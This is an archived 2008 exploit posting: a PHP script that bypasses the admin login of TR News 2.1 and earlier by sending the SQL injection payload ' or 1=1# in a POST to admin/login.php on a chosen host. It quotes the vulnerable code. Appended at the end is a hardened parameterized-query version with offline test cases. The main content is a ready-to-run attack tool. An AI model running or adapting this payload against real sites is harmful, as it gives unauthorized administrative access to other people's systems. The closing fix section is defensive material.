
trnews-bypass.txt

Posted Nov 5, 2008
Authored by StAkeR

Remote login bypass exploit for TR News versions 2.1 and below, using SQL injection in admin/login.php.

tags | exploit, remote, php, bypass
SHA-256 | 493418d6d1dd913ffa106d667a19796cc778012055bc46d51fc928b2823b3d89

<?php

error_reporting(0);

/*
------------------------------------------------------
TR News <= 2.1 (login.php) Remote Login ByPass Exploit
------------------------------------------------------
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/trscript-21.zip

File admin/login.php

<?
if(isset($_POST['login_ad']) && ($_POST['password']))
{
    include("../include/connexion.php");
    $login=$_POST["login_ad"];
    $pass=md5($_POST["password"]);
    $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
    $p = mysql_query($sql);
    $row = mysql_fetch_assoc($p);
    $admin = $row['admin'];
    if($admin != 1)

$login = $_POST["login_ad"]; isn't escaped, so you can insert SQL code...
How to fix? Sanitize $login with mysql_real_escape_string or htmlentities.


NOTE:

If the website is vulnerable, you must go to admin/login.php

Username: ' or 1=1#
Password: no-deface

*/

// '#' is used as the regex delimiter because the pattern itself contains '/'
if(empty($argv[1]) or preg_match('#http://(.+?)#i',$argv[1])) athos();

$host = explode('/',$argv[1]);
$auth = "login_ad=%27+or+1%3D1%23&password=athos";


$data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n".
"Host: $host[0]\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($auth)."\r\n\r\n".
"$auth\r\n\r\n";


if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");
if(!fputs($socket,$data)) die("fputs() error!\n");


$content = '';
while(!feof($socket))
{
$content .= fgets($socket);
}
fclose($socket);

if(preg_match("/location: main\.php\?mode=main/i",$content))
{
exploiting();
echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";
exit;
}
else
{
exploiting();
echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";
exit;
}

function athos()
{
global $argv;

echo "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";
echo "[+] Usage: php $argv[0] [host/path]\r\n";
exit;
}

function exploiting()
{
echo "[+] Exploiting";

for($i=0;$i<=3;$i++)
{
echo ".";
sleep(1);
}
}
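
The login check quoted in the comment above, rewritten with a parameterized query so the `login_ad` value is bound as data and never concatenated into the SQL text. This is an added example, not part of the original file or of TR News itself: the table and column names are taken from the quoted query, while `check_admin_login()` and the in-memory SQLite data are hypothetical and constructed for illustration.

```php
<?php
// Added example: hardened form of the admin/login.php check quoted above.
// Table/column names come from the quoted query; check_admin_login() and
// the SQLite demo rows are hypothetical, constructed for illustration.

function check_admin_login(PDO $db, string $login, string $password): bool
{
    // The placeholder keeps $login as data; it can never alter the SQL text.
    $stmt = $db->prepare('SELECT pass, admin FROM tr_user_news WHERE pseudo = ?');
    $stmt->execute([$login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;                       // unknown user
    }
    // md5() is kept only because the quoted code stores MD5 hashes.
    if (!hash_equals($row['pass'], md5($password))) {
        return false;
    }
    return (int)$row['admin'] === 1;        // same admin flag test as the original
}

// Constructed demo data in an in-memory SQLite database (runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tr_user_news (pseudo TEXT, pass TEXT, admin INTEGER)');
$ins = $db->prepare('INSERT INTO tr_user_news VALUES (?, ?, ?)');
$ins->execute(['admin', md5('correct horse'), 1]);
$ins->execute(['writer', md5('hunter2'), 0]);

// [login, password, expected result]
$cases = [
    ["' or 1=1#", 'no-deface',     false],  // input from the NOTE in the comment
    ['admin',     'correct horse', true],
    ['admin',     'wrong',         false],
    ['writer',    'hunter2',       false],  // valid user, not an admin
];
foreach ($cases as [$login, $password, $expected]) {
    $got = check_admin_login($db, $login, $password);
    printf("%-12s => %-5s (%s)\n", $login, var_export($got, true),
           $got === $expected ? 'ok' : 'MISMATCH');
}
```

`htmlentities` is an HTML output encoder and, depending on PHP version and flags, leaves single quotes untouched, so binding the value as above is the dependable fix for the query itself.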
